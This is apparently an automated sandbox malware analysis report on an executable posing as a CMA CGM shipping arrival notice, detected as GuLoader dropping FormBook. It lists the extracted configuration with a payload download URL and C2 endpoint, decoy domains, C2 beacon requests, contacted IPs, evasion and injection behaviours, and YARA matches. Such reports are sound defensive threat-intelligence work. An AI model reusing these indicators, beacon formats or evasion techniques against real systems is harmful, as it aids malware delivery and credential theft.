Windows Analysis Report NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe

Overview

General Information

Sample Name: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Analysis ID: 482590
MD5: e8bceea59b2074bd08bf68ab55ecdf3e
SHA1: 8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
SHA256: 0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
Tags: exe

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}
Multi AV Scanner detection for submitted file
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Virustotal: Detection: 25%
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 14.2.rundll32.exe.a04480.0.unpack Avira: Label: TR/Dropper.Gen
Source: 14.2.rundll32.exe.4d6f834.4.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80
Source: C:\Windows\explorer.exe Network Connect: 142.111.236.6 80
Source: C:\Windows\explorer.exe Domain query: www.microsoftjob.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Domain query: www.wxsjykj.com
Source: C:\Windows\explorer.exe Domain query: www.everythingswallow.com
Source: C:\Windows\explorer.exe Domain query: www.acooll.com
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe Domain query: www.priorpublic.com
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.117 80
Source: C:\Windows\explorer.exe Network Connect: 54.65.172.3 80
Source: C:\Windows\explorer.exe Domain query: www.taylormakeyourlife.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.beckyhartpcpublishers.com
Source: C:\Windows\explorer.exe Domain query: www.rlmwebcreations.com
Source: C:\Windows\explorer.exe Domain query: www.dominionhavanese.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.acooll.com/kbl2/
Source: Malware configuration extractor URLs: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.everythingswallow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.priorpublic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.taylormakeyourlife.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.rlmwebcreations.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.beckyhartpcpublishers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.microsoftjob.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.wxsjykj.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1 Host: www.acooll.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.117
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: www.paulassinkarchitect.nl Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 13 Sep 2021 21:01:26 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000003.1187824235.00000000009C6000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/display.cfm
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin?
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binW
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.value-domain.com/
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.value-domain.com/modall.php
Source: unknown DNS traffic detected: queries for: www.paulassinkarchitect.nl

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929269162.00000000007BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Uses 32bit PE files
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Detected potential crypto function
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781055
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078F4F6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B52A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00793504
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875D7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A83B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781EEB
